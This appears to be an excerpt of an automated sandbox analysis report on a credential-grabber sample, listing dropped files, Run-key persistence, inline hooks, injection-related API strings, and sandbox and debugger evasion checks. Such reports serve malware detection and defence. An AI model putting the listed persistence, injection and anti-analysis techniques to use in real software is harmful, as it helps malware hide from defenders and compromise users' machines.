                  Source: C:\Users\user\AppData\Roaming\systemsx.exeFile created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_socket.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\python38.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeFile created: C:\Users\user\AppData\Roaming\systemsx.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Changes the view of files in windows explorer (hidden files and folders)
                  Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                  Modifies the prolog of user mode functions (user mode inline hooks)
                  Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B5590 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0E8B5590
                  Source: C:\Users\user\Desktop\Grabber.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking mutex)
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_11-1200
                  Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                  Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_6-1146
                  Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-1442
                  Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_11-1474
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-1200
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-1438
                  Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
                  Source: msiexec.exe, 00000013.00000002.2243622840.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEXW
                  Source: explorer.exe, 00000007.00000003.3101179686.000000000AA45000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GETTHREADIDKERNEL32NTDLLISWOW64PROCESSKERNEL32ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNE